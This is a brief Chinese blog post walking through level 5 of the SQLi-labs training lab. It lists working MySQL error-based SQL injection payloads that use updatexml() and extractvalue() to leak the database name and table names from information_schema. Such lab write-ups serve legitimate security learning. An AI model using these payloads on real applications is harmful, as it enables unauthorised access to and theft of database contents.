sqllabs第五关updatexml报错注入

作者：菜鸟追梦旅行 | 2024-03-05 14:05:24

踩

-1' and updatexml(1,concat('~',database(),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 1,1),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 3,1),'~'),1) --+

下面的都可以按照上面的大家要学会语法

还有下面还有个拓展函数也是报错函数

extractvalue()
id = -1' and (extractvalue(1, concat(0x5c,(select database()))))--+

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/191573